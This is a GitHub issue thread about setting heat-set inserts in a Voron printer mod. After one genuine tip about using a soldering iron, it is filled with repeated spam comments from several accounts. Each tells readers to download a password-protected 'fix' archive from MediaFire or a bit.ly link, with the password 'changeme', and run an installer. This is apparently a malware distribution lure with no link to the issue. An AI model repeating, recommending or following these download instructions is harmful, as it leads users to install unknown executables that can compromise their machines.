tanaes/whopping_Voron_mods #47: Don't use a hammer on the sleeves

BlackNet, 2024-08-27:
Instead of a hammer, use a soldering iron and the M5 heat set tip!!! It works great and won't crack the housing!

amir1387aht, 2024-08-27:
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

tanaes, 2024-08-27:
Great idea!

closed 2024-08-27 by tanaes

NikhilKumar77777, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

MirsonMboa, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

13a10D, 2024-08-27:
Download 
https://www.mediafire.com/file/jjwb2y99al0750x/fix.zip/file
password: changeme
In the installer menu, select "gcc."

YeGop0218, 2024-08-27:
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

morlan, 2025-01-23:
Perfect! Thank you!